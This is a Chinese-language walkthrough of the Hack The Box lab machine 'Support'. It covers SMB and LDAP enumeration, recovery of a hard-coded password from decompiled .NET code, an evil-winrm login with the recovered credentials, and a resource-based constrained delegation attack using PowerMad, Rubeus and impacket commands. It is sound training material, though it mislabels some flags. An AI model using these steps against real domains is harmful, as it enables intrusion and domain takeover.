使用nmap进行端口探测,发现存在88、135等多个端口。
通过nmap发现,这是一个运行 Active Directory (AD) 域控制器 (DC) 的 Windows 服务器。
首先,我们现在知道 DC 域名“support.htb”。我们可以枚举 DNS 服务器来确认系统的名称。
我们的 dig 命令确认服务器的计算机名称是“dc”,域名是“support.htb”。
SMB 文件共享是重要的信息收集方式,然后我们去枚举SMB 文件共享。
发现了一个名为“support-tools”的共享。
使用“dir”命令,我们可以获得存储在“support-tools”上的文件的目录列表。然后下载所有文件,去在本地进行分析。
在连接的 SMB 会话中,运行以下命令。
SMB:> mask ""
SMB:> recurse ON
SMB:> prompt OFF
SMB:> mget *
“UserInfo.exe.zip”。检查文件的哈希值,发现这个“UserInfo.exe.zip”文件包含一个“UserInfo.exe”。
当面对具有如此多端口的 Windows 服务器时,我通常会根据我的舒适程度优先处理它们。我将生成一个分层列表,其中包含一些关于我可能在每个列表中寻找的内容的粗略想法:
必须看
SMB - 寻找任何开放的共享,看看我能在那里找到什么。
LDAP - 我可以在没有凭据的情况下获取任何信息吗?
如果那些失败
Kerberos - 我可以暴力破解用户名吗?如果我找到任何东西,它们可以作为 REP 烤吗?
DNS - 我可以进行区域传输吗?暴力破解任何子域?
RPC - 是否可以匿名访问?
学分注意事项
WinRM - 如果我能在 Remote Management Users 组中找到用户的凭据,我可以获得一个 shell
我们可以使用“mono”或“wine64”等模拟器运行 Windows 可执行文件。
使用ldapsearch获取文件内容。
要继续搜索,它说我需要身份验证(“成功绑定”):
创建一个目录,然后解压压缩包。
然后给Userinfo.exe增加执行权限。
使用Userinfo.exe去枚举信息
前面提到服务器,打开 Wireshark 并再次运行它。发现它正在寻找support.htb:
接着看请求包。
使用 LDAP 查询:
PS > .\UserInfo.exe -v find -first john
[*] LDAP query to use: (givenName=john)
[-] No users identified with that query.
做一些基本的 LDAP 注入,让所有用户都有名字:
PS > .\UserInfo.exe find -first '*'
raven.clifton
anderson.damian
monroe.david
cromwell.gerard
west.laura
levine.leopoldo
langley.lucy
daughtler.mabel
bardot.mary
stoll.rachelle
thomas.raphael
smith.rosario
wilson.shelby
hernandez.stanley
ford.victoria
使用有效名称,它会打印出可能需要的有关用户的信息:
PS > .\UserInfo.exe user -username smith.rosario
First Name: rosario
Last Name: smith
Contact: [email protected]
Last Password Change: 5/28/2022 7:12:19 AM
我可以进一步研究 LDAP 注入,但考虑到它正在对 Support 进行 LDAP 查询,并且我已经表明这些查询需要身份验证,我将查看二进制文件以找到凭据。
将UserInfo.exe在 DNSpy 中打开。
LdapQuery似乎是一个很好的起点。有两个函数printUser和query,它们可能与这两个命令匹配。显示它正在加载密码,然后使用用户 SUPPORT\ldap 和该密码连接到 LDAP。
我需要查看Protected.getPassword()函数(实际上是整个类):
using System;
using System.Text;namespace UserInfo.Services
{
// Token: 0x02000006 RID: 6
internal class Protected
{
// Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318
public static string getPassword()
{
byte[] array = Convert.FromBase64String(Protected.enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
}
return Encoding.Default.GetString(array2);
}// Token: 0x04000005 RID: 5
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";// Token: 0x04000006 RID: 6
private static byte[] key = Encoding.ASCII.GetBytes("armando");
}
}
我们接着往下看,没有发现别的有用的代码。
我将使用 Python 终端解密密码:
在我的 Linux 系统上,我已经安装了 .NET 框架,它与mono二进制文件一起提供,也可以用来运行这个二进制文件。如果我打开 Wireshark 并运行二进制文件,我将在 LDAP 流中捕获身份验证:
使用Wireshark 在“bindRequest”的数据包中看到:
crackmapexec是快速展示这些信息的好方法:
使用Bloodhound收集信息。
下面这些就是使用Bloodhound.py收集的一些信息。
都是json格式的文件。
ldapsearch将显示 AD 中的所有项目。
发现有一个名为 support 的用户。
“Ironside47pleasure40Watchful”是它的密码。
使用ldapdomaindump发现也存在相同的信息。
查看 Bloodhound 数据,支持显示为 Remote Management Users 的成员:
evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful
使用之前获取到的用户名和密码进行连接,连接之后获取到第一个webshell。
然后进入Desktop,获取到root.txt.
我们接着往下看。
再次查看 Bloodhound 数据,支持用户是 Shared Support Accounts 组的成员,该组GenericAll在计算机对象上具有 DC.SUPPORT.HTB:
这类似于基本的约束委派,但不是授予对象权限以针对服务模拟任何用户。Resource-based Constrain Delegation在能够模拟任何用户的对象中设置。
在这种情况下,受限对象将具有一个名为msDS-AllowedToActOnBehalfOfOtherIdentity的属性,其中包含可以模拟任何其他用户的用户名。
此约束委派与其他委派的另一个重要区别是,任何对计算机帐户(GenericAll/GenericWrite/WriteDacl/WriteProperty/etc )具有写权限的用户都可以设置msDS-AllowedToActOnBehalfOfOtherIdentity(在其他形式的委派中,您需要域管理员特权)。
如果您对计算机帐户具有等效的写入权限,则可以获得该计算机的特权访问权限。
假设攻击者已经在受害计算机上写入了等效的权限。
1 .攻击者破坏具有SPN或创建一个(“服务 A”)的帐户。请注意,没有任何其他特殊权限的任何管理员用户最多可以创建10 个计算机对象 ( MachineAccountQuota )并为它们设置一个SPN 。因此,攻击者只需创建一个 Computer 对象并设置一个 SPN。
2 .攻击者滥用其对受害计算机 (ServiceB) 的 WRITE 特权来配置基于资源的约束委派,以允许 ServiceA 冒充该受害计算机 (ServiceB) 的任何用户。
3 .攻击者使用 Rubeus 为具有服务 B特权访问权限的用户执行从服务 A 到服务 B的完整 S4U 攻击(S4U2Self 和 S4U2Proxy) 。
1 .S4U2Self(来自 SPN 受损/创建的帐户):向我请求管理员的 TGS (不可转发)。
2 .S4U2Proxy:使用之前步骤中不可转发的TGS向管理员请求TGS给受害者主机。
3 .即使您使用的是不可转发的 TGS,因为您正在利用基于资源的约束委派,它也会起作用。
4 .攻击者可以传递票据并冒充用户来访问受害者 ServiceB 。
要检查您可以使用的域的MachineAccountQuota :
我要滥用基于资源的约束委派。首先,我将在我控制的域中添加一台假计算机。然后我可以作为 DC 为假计算机请求 Kerberos 票证,从而能够模拟其他帐户,如管理员。为此,我需要一个可以将机器添加到域中的经过身份验证的用户(默认情况下,任何用户最多可以添加 10 个)。这是在ms-ds-machineaccountquota属性中配置的,它需要大于 0。最后,我需要对加入域的计算机(GenericALL在 DC 上得到我)的写入权限。
我需要三个脚本来完成这次攻击:
PowerView.ps1
PowerMad.ps1
Rubeus.exe (来自SharpCollection的预编译 exe )
上传这些工具到目标机器中。
upload /home/kali/PowerSploit/Recon/PowerView.ps1
将这些工具都上传好之后。
我需要知道 DC 上的管理员,Bloodhound 告诉我是 [email protected]:
验证用户是否可以将机器添加到域中:
发现其设置为默认值 10,确保环境中有 2012+ DC:
我们首先需要连接到“dc.support.htb”服务器;使用相同的 Evil-WinRM 会话连接。连接后,将我们需要的两个工具上传到服务器上,Powermad和Rubeus。上传后,我们将执行以下操作。
将新的假计算机对象添加到 AD。
将新的假计算机对象设置为具有约束委派权限。
为新的假计算机生成密码哈希。
使用 PowermadNew-MachineAccount来创建一台假计算机:
New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
1.使用内置 AD 模块,给新的假计算机对象 Constrained Delegation 权限
2.使用内置 AD 模块,检查最后一个命令是否有效。
Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')
Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount
./r.exe hash /password:123456 /user:FAKE01$ /domain:support.htb
解压我们要用到的工具。
我们已经利用了这个安全漏洞,并赋予计算机对象“FAKE01”冒充另一台计算机。因此,我们向“dc.support.htb”上的资源请求一个新的 Kerberos Ticket-Granting-Ticket(TGT)。
使用impacket工具获取管理员权限,我们成功获取到管理员权限。
然后进入Desktop,获取到了root.txt
在整个过程中,用到了SMB文件共享和枚举、wireshark分析数据包、.net代码审计及ldAP密码恢复。基于资源的约束委派攻击和一些工具的使用,感兴趣的小伙伴可以尝试一下。
公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏